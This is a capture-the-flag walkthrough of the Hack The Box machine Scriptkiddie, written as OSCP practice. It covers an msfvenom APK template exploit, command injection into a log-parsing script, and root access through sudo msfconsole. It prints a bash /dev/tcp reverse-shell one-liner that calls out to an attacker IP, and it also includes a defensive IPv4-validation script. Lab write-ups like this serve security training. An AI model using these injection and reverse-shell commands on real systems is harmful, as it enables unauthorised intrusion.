OSCP PREPARATIONS – HTB Scriptkiddie

Scriptkiddie is a retired Linux machine on Hack The Box. By exploiting its vulnerabilities, we are expected to obtain the user and root flags.
To get to know the target machine, we first run a network scan with nmap.
Classic Scan

The port scan shows two open ports: 22/tcp (SSH, OpenSSH 8.2p1) and 5000/tcp (HTTP, Werkzeug). Since there is no vulnerability to exploit on the SSH port, we continue enumeration on port 5000.
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
Let’s take a closer look at this port.
(Werkzeug is a comprehensive WSGI web application library. WSGI (Web Server Gateway Interface) is a specification that describes how a web server communicates with web applications and how web applications can be chained together to process a request. https://werkzeug.palletsprojects.com/en/2.3.x/)

The page offers nmap, payloads and sploits options; we tested them and they work. We also ran gobuster to check whether there are any other directories or files.

The directory search yielded no results, so we focus entirely on the Werkzeug side.
We notice that the nmap, searchsploit and msfvenom tools are available here.
We use searchsploit to check whether there is a known vulnerability in the msfvenom feature on the web side.

We see that there is a vulnerability related to msfvenom; let’s create our shell from the attacker machine.

We open the exploit code we saved in nano and change the payload section; this is where our shell file will be executed on the target side.

With the payload section edited, the next step is creating the exploit.

We created the exploit and moved it to our main folder as evil.apk.
After moving evil.apk to the main folder, let’s create the Shell.sh payload file.

Our shell file has been created; now let’s start a web server with Python so that the target can fetch our exploit evil.apk.

As we can see, our shell was fetched and executed, giving us a reverse shell.

Here we got our user flag.
Since we don’t have access to the /root directory, let’s move on to privilege escalation.

To escalate privileges on the machine, we first perform local enumeration.

We run the following commands to list files with the SUID bit set, i.e. files that execute with root privileges:

find / -perm -u=s -type f 2>/dev/null
find /pwn -perm -u=s -type f 2>/dev/null

The /home/pwn/scanlosers.sh file draws our attention; let’s see what’s in it.

Command injection is possible here: the cut -f3 output tells us that the first 6 characters are cut, and then the command is executed.
We use the appropriate reverse shell command:
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.13/4723 0>&1' #

The purpose of the # is to turn everything that follows it into a comment, so the rest of the original command line is ignored.
After this command runs, we have a shell as user pwn.
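The root cause of this step is a script that takes a field out of a log file and hands it to a shell without checking it. As an added example written from the defender’s side (this is not the machine’s scanlosers.sh), the script below validates the third space-separated field as an IPv4 address before it is used anywhere; the log lines are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not the machine's scanlosers.sh: validate the third
# whitespace-separated field of each log line as an IPv4 address before it
# is handed to any other command. Assumption: log lines are space-delimited.

# is_ipv4 ADDR: return 0 if ADDR is a dotted quad with every octet in 0-255.
is_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # only digits and single dots
    esac
    old_ifs=$IFS; IFS=.
    set -- $1                                  # split on the dots
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# safe_targets: read log lines on stdin and print only third fields that
# pass is_ipv4; anything else is reported on stderr and never reaches a shell.
safe_targets() {
    while IFS= read -r line || [ -n "$line" ]; do
        field=$(printf '%s\n' "$line" | cut -d' ' -f3)
        if is_ipv4 "$field"; then
            printf '%s\n' "$field"
        else
            printf 'rejected line: %s\n' "$line" >&2
        fi
    done
}

# sample_lines: constructed input, one valid entry and three that must be dropped
# (a trailing shell metacharacter, an out-of-range octet, a short address).
sample_lines() {
    printf '%s\n' \
        'Jan 01 10.10.14.13' \
        'Jan 01 10.10.14.13;' \
        'Jan 01 999.1.1.1' \
        'Jan 01 1.2.3'
}

sample_lines | safe_targets
```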

We still don’t have root access, so we perform local enumeration again for privilege escalation.
We run sudo -l to see which commands can be run with sudo.

Here we see that msfconsole can be run with sudo.
Let’s check GTFOBins to see how we can use it to get root privileges.

Using the /bin/bash command from within msfconsole, we obtain root privileges.

Here we got the root flag.